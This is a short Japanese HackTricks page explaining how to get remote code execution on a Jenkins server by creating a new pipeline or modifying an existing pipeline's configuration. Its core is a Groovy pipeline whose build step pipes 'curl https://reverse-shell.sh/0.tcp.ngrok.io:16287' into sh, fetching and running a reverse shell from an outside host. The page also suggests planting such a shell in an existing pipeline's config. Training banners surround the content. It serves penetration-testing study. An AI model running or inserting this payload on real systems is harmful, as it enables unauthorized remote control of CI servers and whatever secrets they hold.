Jenkins RCE パイプラインの作成/修正

Reading time: 3 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

新しいパイプラインの作成

「New Item」(/view/all/newJobでアクセス可能)でPipelineを選択します:

Pipelineセクションリバースシェルを書きます:

groovy
pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

最後に保存をクリックし、今すぐビルドをクリックすると、パイプラインが実行されます:

パイプラインの修正

構成ファイルにアクセスできる場合は、単にリバースシェルを追加して修正し、それを実行するか、実行されるのを待つことができます。

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする